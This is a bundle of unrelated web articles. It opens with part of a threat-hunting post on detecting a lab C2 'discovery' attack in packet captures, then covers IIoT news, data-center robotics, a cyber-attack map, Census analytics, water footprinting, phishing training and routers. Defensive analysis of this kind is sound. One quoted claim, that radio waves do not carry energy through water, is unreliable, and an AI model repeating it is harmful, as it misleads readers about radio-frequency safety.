If BeaKer (pictured above) is installed on the local system, we can use it to see which processes on the host machines are responsible for the connection in question. There appears to be a single executable file which, in this case, must be the stager for the command and control channel. We also see several instances of PowerShell on our machine connecting to the machine in question. While PowerShell itself is a legitimate program, it is both easy and common for attackers to abuse it. PowerShell exploits are especially convenient because the tool is often trusted and not deeply monitored by most antivirus programs.
So how do we bridge the gap between finding a malicious network connection and determining that it was on a discovery mission, collecting system information?
This can be tricky, or sometimes impossible, depending on the network protocol and how the data is encrypted. Previously we saw that this connection used the HTTP protocol. Since HTTP is a plain-text protocol and we have the packet capture, we may be able to figure out exactly what was sent over the wire, depending on whether the payloads were encrypted prior to transport.
In the screenshot above, we opened the PCAP in Wireshark and then filtered for the IP in question and the HTTP protocol. In the highlighted request we see a file named “181475_credstuffuserpass.txt” was posted to the server. Taking a look at the other requests may give a clearer picture of what the adversary was doing, but we leave that task to you, the threat hunter, to complete.
We encourage you to download and use the PCAP files included in the next section to analyze these files independently using your preferred threat hunt platform to test your detection capabilities.
Because… PCAPs, or it didn’t happen. 😊
The following PCAP files are packet captures taken from the same lab environment over a one-hour time frame and a 24-hour time frame. The files were generated using Wireshark from the target host and include normal Windows OS traffic and normal network broadcast traffic. They have not been edited. The PCAPs are safe, standard PCAP files and do not include any actual malware.
CALDERA Discovery 1 Hour Capture
Size: 119.48 MB
SHA256 Checksum: 793622CCFCF2FA4788C93B327C874A8A80A5C02576F7BEE9F8FF574103B22A03
CALDERA Discovery 24 Hour Capture
Size: 240.92 MB
SHA256 Checksum: E81FD13ECDCA3E01235E683806115A5E3189EEDE4739709BFBF7A40B2AE190F0
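Once downloaded, the captures can be checked against the published checksums before you open them. A minimal Python sketch follows; the local filename is an assumption (use whatever name you saved the capture under):

```python
import hashlib

def sha256_hex(data: bytes) -> str:
    """Uppercase SHA256 hex digest of a byte string."""
    return hashlib.sha256(data).hexdigest().upper()

def verify_capture(path: str, expected: str) -> bool:
    """Compare a downloaded capture file against its published checksum."""
    with open(path, "rb") as f:
        return sha256_hex(f.read()) == expected

# Hypothetical local filename -- substitute your own:
# verify_capture(
#     "caldera-discovery-1h.pcap",
#     "793622CCFCF2FA4788C93B327C874A8A80A5C02576F7BEE9F8FF574103B22A03",
# )
```

The same check can be done with the `sha256sum` utility on most Linux systems.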
Want to talk about this or anything else concerning threat hunting? Want to share how good (or not so good) other detection tools were able to detect this sample?
You are welcome to join our Discord server titled “Threat Hunter Community” to discuss topics surrounding threat hunting. We invite you to join our server here.
Interested in threat hunting tools? Check out AC-Hunter
Active Countermeasures is passionate about providing quality, educational content for the Infosec and Threat Hunting community. We appreciate your feedback so we can keep providing the type of content the community wants to see. Please feel free to Email Us with your ideas!
Hannah joined Active Countermeasures as an intern in 2020. She is currently a graduate student at the University of Utah. | <urn:uuid:60fc95f4-887d-4cbf-bba2-732b217f3971> | CC-MAIN-2022-40 | https://www.activecountermeasures.com/malware-of-the-day-malware-techniques-discovery-and-information-gathering/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00155.warc.gz | en | 0.927356 | 1,594 | 2.65625 | 3 |
As the Industrial Internet of Things (IIoT) drives the production of connected devices, wireless and Ethernet-based technologies have become an important piece of the connectivity conversation. Entire industries are making digital transformations and it’s changing the way businesses operate. There are billions of IoT devices in service and development continues to ramp up. Recently, we’ve seen several wireless and Ethernet technologies headlines in the news.
Wireless and Ethernet News
By David Greenfield | Published on @automationworld
“We’ve targeted a small scale, single-chip processing solution (to bring Ethernet to industrial edge devices) by reducing processor speed, memory and RAM size, reducing the interconnection complexity from processor to network interface, and reducing the pin count and complexity of the network interface,” said Weingartner. Essentially, “we’re bringing MAC into the PHY (the physical layer of the OSI model which connects a MAC to a cable), which is what Ethernet is all about. Doing this opens up possibilities not just for new implementations, but for brownfield applications as well.”
“What’s called dynamic charging foresees a future where vehicles charge themselves as they drive. Using coils embedded in roads, EVs would refuel as they stay in transit, creating their own self-perpetuating electrical loop. It’s similar to the way some mobile devices get charged.”
By David Chalupsky | Published on @
“For many years, Ethernet evolution was characterized by the “need for speed” as networks and data centers sought higher and higher throughput. But over time, Ethernet has found its way into applications unforeseen by the developers of the original specification, resulting in a broad and varied Ethernet ecosystem. Today the desire to bring the advantages of Ethernet into new applications necessitates a new approach where the needs of the application are considered first and foremost in defining new Ethernet incarnations.”
“The most promising of wireless power technology seems to be radio frequency. With its apparent lack of serious problems and its unique strengths, radio frequency has the greatest long-term potential to become the market’s leading source of wireless power to fuel the Internet of Things. No significant evidence exists depicting radio frequency as posing a threat to humans. The human body consists mostly of water and radio waves do not transmit energy through water. Radio frequency is also highly configurable. Devices sending and receiving radio frequency power can easily be equipped with regulators, enabling control of how much power will be emitted and received.” | <urn:uuid:f5e0a47a-6144-4d15-b1cd-10d217dd4c29> | CC-MAIN-2022-40 | https://www.freewave.com/wireless-and-ethernet-news/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00155.warc.gz | en | 0.941245 | 528 | 2.546875 | 3 |
Ask any IT manager and one of their primary concerns is security. The number and sophistication of attacks from both internal and external sources continue to grow, making IT security and risk mitigation full-time jobs. Even then, many have commented that it isn’t a question of if you will be breached, but when.
To date, security concerns have been addressed via the deployment of purpose-built appliances for detecting, monitoring and quarantining common known attacks from external sources, as well as firewalls for both hardened perimeters and internal segmentation. In addition, internal threats have been tackled via software-based policies, password and authentication technologies, siloed departments and access control, and other advances like auto-redaction. But the question remains: is this all that can be done, or are there areas for advancement not currently in use?
One area current security approaches don’t address is the infrastructure itself. Network infrastructure in the data center is currently static, meaning IT must take a very hands-on approach to making and maintaining connections so the business can move forward. This not only can lead to more money and time being spent to manage growing data centers, but also introduces potential security threats and impacts businesses ability to respond in the event of either malicious or unintentional breaches.
With data centers now sprawling across millions of square feet, and the effort required to secure them continuing to grow, IT managers must consider ways to make infrastructure more dynamic so it is easier to respond to incidents and control points of vulnerability. Robotics presents a compelling case and can be leveraged to significantly improve data center security response.
Security concern: The risk of human error – whether malicious or not
Let’s face it, humans make errors. Whether they are simple mistakes or malicious acts, these errors can pose a profound risk to a business and its data. The security threats posed by traditional viruses, Trojan horses and other common methods are well known and documented, and are currently protected against by advanced firewalls and other appliances.
However, many forget to consider and address another point of vulnerability: the infrastructure itself. At present, all optical connections within a data center are managed manually. Miscommunication or other human error during simple maintenance or adjustments to network infrastructure increases the potential for a wrong move, letting security threats quickly become a bigger problem. Automating these connections and removing the potential for human error can simplify monitoring of potential areas of exposure and help save money in the process.
Security concern: Quickly stopping a security threat in its tracks
How long it takes to react to a security threat can be the difference between an easy fix and a major headache. When a security breach happens, certain things need to be done very quickly to cut off the bridge and reroute traffic so as to prevent the threat from spreading. Today, physical connections in remote data centers must be changed manually, meaning a company can respond only as quickly as it can dispatch an operator to get to work.
It takes people time to travel, to get on the phones and to get to the data center to fix the issue. This valuable lost time gives security vulnerabilities longer to propagate, potentially exposing additional machines and servers. Taking a more proactive approach to your infrastructure and enabling dynamic, remote management can significantly improve your business’ time to response and enable IT to quickly mitigate risk.
Solution: Robotic automation
These security concerns become nonexistent with the incorporation of robotics into the data center. Putting traditionally manual tasks in the “hands” of robots makes data center networks more secure, and security issues can be resolved in real time, remotely, with no worry of human error or lag time. Robotic technologies make the network infrastructure dynamic, and can assist IT staff in quarantining threats by eliminating connections to other systems remotely in a fast manner.
Additionally, robotic automation simplifies network infrastructure. Currently, connectivity in the data center runs across many different layers of technology and protocols, making the network complex and leaving it open to vulnerability. Introducing robotic physical optical connectivity, where a physical connection can be set up through software under application control (often called SDN), simplifies this: applications can establish connectivity when and as they need it.
A robotic technology that can physically connect or disconnect a network link quickly brings more security and manageability, making it possible to build a more robust and simpler network and resulting in a higher level of security. By introducing robotic technology to manage the physical optical connections within the network, operators will see not only improved security response but also reduced OPEX and CAPEX and improved reliability, while future-proofing their critical infrastructure.
David Wang is CEO of Wave2Wave, a data center connectivity company headquartered in California. | <urn:uuid:ff53249f-f8a4-4c0a-8c37-c8cbffc3a0d9> | CC-MAIN-2022-40 | https://www.datacenterdynamics.com/en/opinions/are-robots-the-cure-for-it-security-ills/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00155.warc.gz | en | 0.945446 | 986 | 2.5625 | 3 |
If you went to school in the 90s, 80s, or before then, you’ll remember the chalkboards that once filled the hallways of our schools. You’ll also remember making the “nails on a chalkboard” sound when a piece of chalk was used the wrong way. Then there were the overhead projectors. Who didn’t love the thrill of being allowed to write on the transparency with a dry-erase marker and seeing the results projected on the wall?
Good thing for us, classroom lessons have evolved quite a bit since then thanks to game-changing technology. Students born into the digital age are now learning more efficiently by adapting to a technologically forward learning experience. Interactive whiteboards invite students to actively engage with lessons and teachers aren’t limited in what they can present and how they collaborate with their students.
How can an interactive whiteboard enhance my classroom?
SOURCE Sharp AV | <urn:uuid:d14c1944-00d8-4415-babf-3a5343459e5c> | CC-MAIN-2022-40 | https://www.industryanalysts.com/081722_sharpav/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00155.warc.gz | en | 0.963534 | 192 | 2.515625 | 3 |
We've all heard that the scale and number of cyber attacks are constantly increasing, and that the bad guys are only getting smarter – but can you actually picture what the unfolding exchange of cyber attacks looks like around the world?
Well now you can, with security company Norse's real-time online map of global cyber attacks. The map uses honeypot servers around the world to entice attackers into launching their attacks, and then displays them in real time on the map. The result is pretty mesmerising, and shows the true scale of the worldwide cyber war going on all around us.
Most attacks originate in the US or China, usually targeted at each other, but other attacks originate from Russia, Southeast Asian countries like Malaysia, and all across Europe – even the UK.
You can also see which type of hack is being used. The result is rather varied: Microsoft-DS (port 445) is still one of the top targets (it's the port used for Windows file sharing), but DNS (port 53), SSH (22), and HTTP (80) are all very popular too.
You'll probably see a lot of CrazzyNet and Black Ice, too — two common Windows backdoor programs often used by script kiddies and criminals, rather than actual cyber warriors or nation states.
Every now and then, you'll also catch sight of a huge co-ordinated attack originating in China and coming down on the US like the fiery fist of an avenging God. While there's no direct evidence linking these back to the Chinese government, they do seem to happen all at once from a lot of different locations around the country – suggesting that someone is co-ordinating them – whether a cyber criminal mastermind or the Chinese government itself.
Back in 2012, the US Department of Defense reported that it was the target of 10 million cyber attacks every day; likewise, the National Nuclear Security Administration (which is in charge of the US's nuclear stockpile), says it saw 10 million attacks per day in 2012. We can only assume that these numbers have increased over the intervening years.
While the targets aren't real, the attackers on the map are, and we can suppose that the actual number of attacks going on is much higher than even the Norse map suggests. Still, this will give you some sense of just what's going on out there, and why a strong cyber security policy is a must-have in today's business world. | <urn:uuid:1c17fdfe-8741-4d5a-a77e-30085ab48c25> | CC-MAIN-2022-40 | https://www.itproportal.com/2014/07/03/how-to-watch-global-cyber-war-unfold-before-your-eyes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00155.warc.gz | en | 0.955695 | 497 | 2.8125 | 3 |
The Soviet Union’s launch of Sputnik in 1957 ushered in an era of space exploration that saw both the USSR and the United States double down on their efforts to explore what Gene Roddenberry’s character, Captain Kirk, describes as “the Final Frontier”. President John F. Kennedy accelerated the national focus on space in the 1960’s, calling for the United States to put a person on the moon by the end of the decade.
From that first moonshot to NASA’s successful landing of the Perseverance on Mars in 2021, space has remained a priority for the United States. What has changed is the new technological capabilities other countries and private organizations have acquired for launching spacecraft and satellites into orbit for scientific exploration, communications, intelligence gathering, and even recreational space travel. But what do these advancements mean for us here on Earth?
A New Approach to Data Analytics
According to a recent article in Space News, we are in the midst of another space race. Organizations like the National Geospatial Intelligence Agency (NGA) maintain a lead in the “geoint” race. But with China investing in advanced Low Earth Orbit (LEOs) satellites that can revisit any point on the globe within 30 minutes, agencies like NGA “need new approaches for handling big data and for delivering information to customers faster.”
As the article points out, the key to managing this ever-growing data flow is automation and achieving maximum interoperability between systems. Efficiently managing the extreme influx of data is just the starting point for intelligence organizations like NGA as agencies undertake digital transformation efforts. Agencies are evolving from viewing data analyzed by human analysts, to applying advanced analytics that improve situational awareness and accurately predict events. Big data challenges — similarly facing DOD, I.C.-related, and civilian agencies — require solutions that deliver data agility, unified analytics, and the ability to easily deploy predictive analytics in near real-time.
Near real-time delivery of information is not possible without high-speed analytics and high-volume throughputs across systems. Deploying a higher level of Analytic Process Automation (APA) with predictive modeling capabilities democratizes the ability to harness and leverage vast data from numerous sources, including geospatial and satellite imagery.
Recently, Alteryx partner, Reveal Global Consulting, shared a use case where the U.S. Census Bureau is turning to the use of analytic automation and satellite imagery to speed up the creation of insights that feed key economic indicators.
Economic insights require quality data
“As we advance into the 21st Century, we are experiencing increased demand for our data, struggling with challenges to traditional data collection methods, and exploring rich new data sources and tools that can revolutionize what we do and how we do it. Our success critically depends on our ability to seize the opportunities in front of us to deliver statistical products that address increasingly complex and diverse needs of our users.”
—Ron Jarmin, Deputy Director, U.S. Census Bureau
Most Americans are familiar with the U.S. Census Bureau given its role in surveying every person for the "Decennial Census of Population and Housing." People may not know that the Census Bureau, part of the U.S. Department of Commerce, is the nation’s leading provider of quality data about the economy.
Mandated by law, Census collects, analyzes, and reports actionable data about people, places, and the health of the economy to Congress; the White House Office of Management and Budget; federal, state, and local government agencies; news organizations; businesses; and the public. For example, Census data, research findings, and key indicators are used to:
- Assess the health of the U.S. economy
- Allocate funding for new roads and schools
- Define voting districts
- Provide services for the elderly
- Locate job training centers
- Qualify people for social security
- Assess construction spending and activity
- Audit disaster recovery spending
Data as a Strategic, High-Value Asset
Census data is one of our most valuable national assets. It must be accurate, timely, protected, and used wisely to effectively allocate over $675 billion in federal funding to states, local communities, and businesses.
For the past several decades, Census has relied heavily on burdensome manual processes and outdated tools to collect, process, analyze, and report data on the population, housing, businesses, workforce, public finance, resources used, and more. The sheer volume, velocity, and veracity of Census’ big data are hard to manage with legacy systems. Manual surveying and data processing are labor-intensive, tedious, and costly.
Analytic Automation Enables Insights on Construction Indicators
As part of its digital transformation efforts, U.S. Census Bureau Economic Indicators Division, Construction Programs, contracted Reveal Global Consulting to design, build, and deploy modernized and automated approaches for data collection, analysis, and dissemination that reduce operational costs while improving the accuracy and quality of Census economic indicators. Specifically, Census wanted an advanced analytics and process automation solution to compile and release U.S. economic indicator data worldwide that would meet specific requirements and achieve tangible goals:
- Eliminate redundant data entry
- Streamline the indicator release process
- Create a consistent look and feel for the indicators’ website
- Prevent early release of indicators
- Maintain security of indicator information
- Re-use existing systems rather than create new ones
- Use enterprise systems for their primary purposes
- Use a loosely coupled architecture
- Use existing security infrastructure
- Minimize changes to established business processes
- Refactor code rather than rewrite it
- Improve the quality of Census data products
- Prioritize security over performance
A Unified Approach to Analytics
The U.S. Construction Indicator use case required an end-to-end solution with a robust Analytic Process Automation (APA) platform at its core. APA eliminates data analysis barriers by unifying multiple tools into one platform that provides end-to-end, self-service analytics across big data management prep, analytics and data science, and process automation to accelerate insights and actions.
Working directly with the client, Reveal built an advanced analytics and visualization solution for Census that enables the following:
- Modernizes construction industry indicators (housing starts, residential and non-residential construction spending, and others)
- Identifies alternative sources of data to reduce reliance on surveys
- Leverages advanced analytics and automates processes to optimize performance
- Provides advanced analytics and data visualization to provide Census users and external stakeholders with timely, relevant insights for optimal decision-making
- Uses A.I. to analyze satellite image data showing construction activity over time
The solution collects, filters, formats, and aggregates unstructured data from numerous Census and third-party sources. The data is ingested into the Alteryx APA Platform which, in turn, enables the creation and scheduling of workflows that can collect satellite imagery and automate analysis using geospatial and AI/ML capabilities to validate, compile, and create more accurate and timely construction indicator insight. Data utilized includes:
- Third-party U.S. permit data for residential single-family homes
- Web-scraped jurisdiction websites and PDFs
- Census shapefiles for every U.S. state
- Satellite images of construction sites showing pre-construction and post-construction states
Once trained, the analytic solution automates critical functions, including the ability to:
- Filter, format, and aggregate data from multiple sources
- Map and perform geospatial analysis
- Evaluate third-party data coverage and evaluate for accuracy
- Schedule, prompt, and collect CNN Model Classifications
- Evaluate and aggregate image classifications
- Merge third-party construction data and image classifications
- Create visualizations
- Automate the updating of Construction Indicator insights
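As a rough illustration of the final aggregation steps (merging permit records with pre- and post-construction image classifications, then rolling them up into an indicator), consider the hypothetical Python sketch below. The field names and classification labels are invented for illustration; they are not the Bureau's or Alteryx's actual schema:

```python
def count_starts(permits, classifications):
    """Count permits whose site imagery flipped from 'vacant' to 'construction'.

    permits: list of permit IDs from third-party permit data.
    classifications: dict mapping permit ID -> (pre_label, post_label)
        as produced by the image-classification model.
    """
    starts = 0
    for pid in permits:
        pre, post = classifications.get(pid, (None, None))
        if pre == "vacant" and post == "construction":
            starts += 1
    return starts

permits = ["TX-001", "TX-002", "UT-003"]
labels = {
    "TX-001": ("vacant", "construction"),        # activity began
    "TX-002": ("vacant", "vacant"),              # permit issued, no visible start
    "UT-003": ("construction", "construction"),  # already under way
}
print(count_starts(permits, labels))  # -> 1
```

In the production workflow this kind of roll-up runs on a schedule inside the analytics platform rather than as a standalone script.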
Analytics Automation: Accelerating the Quality of Insights
With analytics automation, agencies like the U.S. Census can create, acquire, leverage new data sources, and provide higher quality service offerings and products to end-users. By reducing the need for manual field data collection, aggregation, and other preprocessing efforts, the analytics automation capability enabled by Alteryx and Reveal is accelerating the quality and accuracy of insights on construction activity and is improving organizational flexibility and operational efficiency by allowing the Census resources to focus on high-value tasks.
Watch This Next.
Want to learn more about how Reveal Global Consulting and Alteryx partner to deliver a unified automated analytics capability that reduces manual processes around prepping, blending, and analyzing data, including the automatic creation of geospatial insights from satellite imagery?
Watch our brief video conversation with Reveal.
As organizations embrace the ESG imperative, water footprinting is a term that’s creeping into the corporate consciousness. Positive environmental action demands that your approach embraces all aspects of sustainability, exploring areas that may have historically been lower-profile than, say, carbon footprints and greenhouse gas emissions.
Water footprinting is one of these areas.
What Is Water Footprinting?
As with a carbon footprint, every individual and business will have a water footprint. Everything we consume, manufacture, use, buy or sell will use water in the process. Water usage can vary enormously between sectors. When looking at which industry has the highest water footprint, the paint and coating manufacturing industry was the most water-intensive industrial sector in the US in 2020, using 123 gallons per dollar output. Famously, it takes nearly 2000 gallons of water to make one pair of jeans.
The water footprint, or water footprinting, is the process of measuring the amount of water used to produce the goods and services we use. You can measure your business’s water footprint for a specific process or product. You can also measure your entire organization’s water footprint — even an entire country’s or continent’s.
Why Does Your Water Footprint Matter?
Businesses worldwide are accepting their responsibilities around sustainability and environmental impact. ESG is fast becoming “the way we do things” rather than an overlay or afterthought; it’s expected that reputable businesses take steps to minimize their corporate footprint — and your water footprint is an intrinsic element of that.
Activities and processes vary hugely in the amount of water they use. The process to produce one kilogram of beef requires approximately 15,000 liters of water, for example, while a 150-gram soy burger produced in the Netherlands takes about 160 liters.
And your accountability on water footprinting doesn’t end with your own operations. Understanding the water footprint of your supply chain is also vital — sometimes referred to as “direct” and “indirect” water use. A large percentage of your water footprint might exist beyond your corporate — or even country — borders. About 10% of the Chinese water footprint, for instance, falls outside China.
With shareholders becoming more activist over ESG issues, your ESG policy must be as comprehensive as it can be. This means that calculating your water footprint is an essential element of a fully-rounded approach to ESG.
Calculating your business water footprint enables you to identify where your operations or supply chain are dependent on water and to what extent.
The Green, Blue and Grey Water Footprints
There are three water footprints: green, blue and grey. What makes a blue, green or grey water footprint?
- The green water footprint is water from precipitation. It is stored in the root zone of the soil and is evaporated, transpired or incorporated by plants. It is most relevant to the horticultural, agricultural and forestry industries.
- The blue water footprint is surface water or groundwater that is consumed — in other words, evaporated or incorporated into a crop — during the cultivation process.
- The grey water footprint is the fresh water needed to bring water that has been polluted up to safe water quality standards.
Measuring these footprints will give an organization a comprehensive picture of its overall water footprint.
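For a concrete sense of how the components combine: the overall footprint is the sum of the green, blue and grey volumes, and the grey component is conventionally computed as the pollutant load divided by the difference between the ambient water quality standard and the natural background concentration (the Water Footprint Network's standard formula). The numbers in the Python sketch below are illustrative only:

```python
def grey_water_footprint(pollutant_load, c_max, c_nat):
    """Fresh water volume needed to dilute a pollutant load to standards.

    pollutant_load: mass of pollutant discharged (e.g. kg).
    c_max: maximum acceptable concentration (kg per cubic metre).
    c_nat: natural background concentration (kg per cubic metre).
    Returns a volume in cubic metres.
    """
    return pollutant_load / (c_max - c_nat)

def total_water_footprint(green, blue, grey):
    """Overall footprint is the sum of the three components."""
    return green + blue + grey

# Illustrative numbers only:
grey = grey_water_footprint(pollutant_load=10.0, c_max=0.01, c_nat=0.0)  # 1000 m^3
print(total_water_footprint(green=2500.0, blue=800.0, grey=grey))  # -> 4300.0
```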
How To Calculate Your Water Footprint?
In recent years, organizations have become accustomed to measuring their carbon footprints to comply with global carbon emissions legislation.
Carbon footprints, though, can be easier to calculate than water footprints. Because water is a resource rather than an emission, issues such as supply and scarcity must be taken into account to put water footprint into context.
Steps in Calculating a Water Footprint
Step 1: Calculate how much water is used to produce a product or service in your supply chain
Step 2: Carry out an impact assessment. What does it mean to use this amount of water? In the context of local supply and demand, what impact does it have? Using a liter of water in an area where clean water is at a premium will have more impact than doing the same in an area where it is freely available. This second step can be contentious. Whereas there is a set methodology for calculating carbon emissions, the ways that water impact is measured can be more subjective.
Different Methods for Calculating Water Footprint
When calculating your water footprint, it’s important to carry out a life-cycle assessment (LCA) — a systematic and phased approach to the use of water throughout the life-cycle of the processes, products or services you provide.
Within this, there are two accepted methods for calculating a water footprint: midpoint methods and endpoint methods. Midpoint methods measure impact, while endpoint methods go a step further and include an indicator that measures the damage done via an individual or organization’s actions.
Different midpoint methods for measuring water footprints use different scarcity equations — the calculation used to define how rare a commodity water is. The two main scarcity equations used are:
- Withdrawal to availability (WTA) ratio: How much water is withdrawn locally via industrial processes compared to how much is available
- Consumption to availability (CTA) ratio: As above, but includes only water that is totally removed from the water source as a result of the process (as opposed to water temporarily removed and then returned)
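The two scarcity ratios can be sketched in a few lines of Python. The numbers below are illustrative, and real methodologies differ on exactly how "availability" is defined:

```python
def wta_ratio(withdrawn, available):
    """Withdrawal-to-availability: all water withdrawn, returned or not."""
    return withdrawn / available

def cta_ratio(consumed, available):
    """Consumption-to-availability: only water permanently removed."""
    return consumed / available

# Illustrative basin: 120 units withdrawn, of which 45 are fully consumed,
# against 300 units of local availability.
print(wta_ratio(120, 300))  # -> 0.4
print(cta_ratio(45, 300))   # -> 0.15
```

The CTA ratio is always the smaller of the two for a given basin, since consumed water is a subset of withdrawn water.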
The Endpoint Method
Similarly, different endpoint methods for calculating water footprints use different scarcity equations when evaluating how much damage has been done. Some methods focus only on the impact on human health, while others also consider the impact on ecosystems and other resources.
International Standard on Water Footprinting
In 2014, the ISO published ISO 14046: Water footprint: Principles, requirements, and Guidelines. The international standard sets out principles and requirements for calculating a water footprint and is a helpful reference for any organization starting its water footprinting journey.
Water Footprinting Made Simple
Water footprints are growing more critical as organizations widen the scope of their ESG strategies. Robust data and reporting are as crucial for water footprints as carbon ones.
With water consumption not just an ESG indicator but a substantial cost for many businesses, there are significant benefits to calculating your water footprint and taking steps to reduce it.
To do this successfully, you need accurate and clear dashboards that show water consumption in a granular and comprehensive way.
Trend analysis can help you determine how your water footprint is evolving and, if needed, build a business case for investment in water use reduction strategies and technologies. Top-level aggregation — to engage senior leadership with “big picture” water footprint data — combined with the ability to drill down into the detail, is vital. With water footprinting potentially more complex than other ESG measures, it’s essential that your users have an intuitive experience.
The best water footprinting solutions deliver alerts if there are gaps in your data sources, prompting action where needed, with audit-standard reporting instantly available.
Take the next step to conquer water footprinting as part of your strategy to set, monitor and achieve your ESG goals. Find out more about the ways Diligent’s Modern ESG approach can help. | <urn:uuid:e0296c98-7cce-4cff-9aaf-a05c1426e297> | CC-MAIN-2022-40 | https://www.diligent.com/insights/esg/water-footprinting/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00155.warc.gz | en | 0.928959 | 1,488 | 2.828125 | 3 |
To make training stick, immerse employees
When aspiring pilots go through flight school, they learn both in a conventional ground setting and using a flight simulator. On the simulator, new pilots are immersed in the experience of flying, and receive real-time feedback about their decision making. Not surprisingly, the simulator is seen as a more effective training tool than conventional classroom training.
One of the greatest challenges facing security awareness initiatives is providing employees with an experience they will actually remember and retain. Training users to avoid risky security behavior is not nearly as complicated as teaching someone to fly a plane, but just like with pilots, immersive training that simulates the kind of attack methods employees face is a more effective way to conduct security awareness.
Immersing a human in an experience triggers the brain in a way that traditional training doesn’t – by drawing an emotional response. In complex vertebrates (contrary to what some in security might say, your users do fit into this category), the amygdala is the area of the brain associated with both memories and emotions. This is why hearing that old Van Halen song brings back memories of high school (at least for some of us!). An emotional experience sticks in our memory, making training techniques that elicit emotions more powerful. This is why posters and conventional computer based training fall short.
We observe the fleeting nature of email communication within our own customer base. Some of our customers choose to follow a PhishMe best practice and announce PhishMe campaigns before sending them out, while others do not inform their employees. While it would stand to reason that the employees who had been informed would be less likely to fall for the phish, there is no measurable difference in the end result of the campaigns. Simply sending a person an email informing them that a training exercise is going to be sent through email is not enough to change their behavior. You need to draw an emotional response as well. Those customers that do inform their employees, however, are able to fend off negative backlash as well as eliminate the perception that they are trying to pull one over on the users.
Equally important is providing feedback to participants, as simply simulating an attack won’t provide the meaningful information that triggers the emotional response. If users fall for a simulated phishing attack, but don’t know what they have done, it’s a missed opportunity to change their behavior. A great example of how feedback spurs behavioral change can be seen in the example of radar speeds signs. These are the signs usually placed near a construction site or school and display the speed we are driving just underneath the posted speed limit. These signs are effective at changing behavior positively because they provide us with instant feedback about our behavior, as well as a guideline for improving it. This technique leverages a concept called a feedback loop, discussed in greater detail in an article from Wired magazine.
Repeating immersive training exercises capitalizes on a neurological process called long-term potentiation, which is how the human brain forms and retains memories. Memories form through synaptic connections between neurons, and repetition of those synaptic processes causes us to learn and retain information. Conducting annual training will not lead to retention – even if the training itself is compelling – because it won’t be frequent enough to stick in employees’ minds. Whenever we are learning something new – playing a sport or an instrument, or speaking a new language – repetition is crucial. By repeating his golf swing on the driving range thousands of times, Tiger Woods made that action second nature. It’s the same with teaching email users safe behavior: repeatedly conducting security awareness exercises allows them to make safe email use a habit.
We’ve observed this first-hand with customers who purchase a PhishMe license and then only run one or two campaigns. They don’t see the improvement that customers who run consistent campaigns experience. Moreover, we’ve seen customers use PhishMe successfully to improve organizational resilience to phishing attacks, only to regress upon discontinuing PhishMe. Sporadically conducting training or discontinuing training altogether misses the opportunity to train new employees as well as update training to address emerging attack vectors.
Ultimately, immersing your employees in an experience will improve their behavior. Our experience training over 4 million unique users has shown that around 58% will fall for phishing emails prior to training, but after a few months of immersive training that number can be reduced to less than 10%.
–Rohyt Belani and Scott Greaux | <urn:uuid:f721bba6-0888-4a8d-8795-e60af2789ed9> | CC-MAIN-2022-40 | https://cofense.com/to-make-training-stick-immerse-employees/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00155.warc.gz | en | 0.954579 | 927 | 2.65625 | 3 |
Different Types of Routers in Networking
Routers act as the traffic police of the network, directing traffic between networks and maintaining the best transmission routes. If the network is the core of global communication, then the router is the heart of the network. Many types of routers have emerged to meet the needs of users at different scales. By application, there are five main types of routers on the market: wired routers, wireless routers, core routers, edge routers and VPN routers. The basic information below should help you choose the right one.
Wired Router VS Wireless Router
Wired routers are older versions of routers with cable connections at both ends to receive and distribute data packets. Wireless routers, which transmit data directly to computers and other electronic devices via radio signals, are more advanced.
A wired router connects directly to a computer via a cable. One port is used to connect a modem to receive Internet packets, while the other ports connect to computers to distribute processed Internet packets. The Ethernet broadband router is one of the most classic wired routers. These routers support network address translation (NAT) technology, which allows multiple computers connected to a wired router to share a single public IP address. For security, wired routers use stateful packet inspection (SPI) firewalls while providing communication between computers within the network. However, a wired router supports only a limited number of device connections, and the cabling is inconvenient, so wired routers have gradually been replaced by wireless routers.
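The NAT mechanism mentioned above can be sketched as a translation table: many internal hosts share one public IP by each being assigned a distinct external port. This is a minimal illustrative model, not real router firmware, and all addresses and ports are hypothetical:

```python
# Minimal sketch of a NAT translation table. The router rewrites the
# source of outgoing packets to its single public IP plus a unique
# external port, and maps replies back to the originating host.

PUBLIC_IP = "203.0.113.7"  # hypothetical public address

class NatTable:
    def __init__(self, first_port=40000):
        self.next_port = first_port
        self.outbound = {}   # (internal_ip, internal_port) -> external_port
        self.inbound = {}    # external_port -> (internal_ip, internal_port)

    def translate_out(self, internal_ip, internal_port):
        key = (internal_ip, internal_port)
        if key not in self.outbound:
            self.outbound[key] = self.next_port
            self.inbound[self.next_port] = key
            self.next_port += 1
        return PUBLIC_IP, self.outbound[key]

    def translate_in(self, external_port):
        return self.inbound[external_port]

nat = NatTable()
print(nat.translate_out("192.168.1.10", 51515))  # ('203.0.113.7', 40000)
print(nat.translate_out("192.168.1.11", 51515))  # ('203.0.113.7', 40001)
print(nat.translate_in(40001))                   # ('192.168.1.11', 51515)
```

Note how two internal hosts using the same local port still get distinct external ports, which is what lets replies from the Internet be routed back to the correct machine.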
A wireless router is defined in contrast to a wired router. It can be found in offices, homes and other public places. Like wired routers, wireless routers receive data packets over wired broadband; they then convert the packets, written in binary code, into radio signals that are picked up by electronic devices, which convert them back into packets. Unlike with wired routers, radio is the medium through which packets are sent to electronic devices. So as long as your device is within range of the signal, you just need to enter a specific ID and password to access the Internet. Wireless router security is achieved through wireless media access control (MAC) address filtering and Wi-Fi Protected Access (WPA). The most widely used wireless router application is the familiar home Wi-Fi network. With a password, and assuming your router is powerful enough, there is practically no limit to the number of users who can connect to the network. Easy connections and heavy load capacity are the main reasons wireless routers are popular in the market.
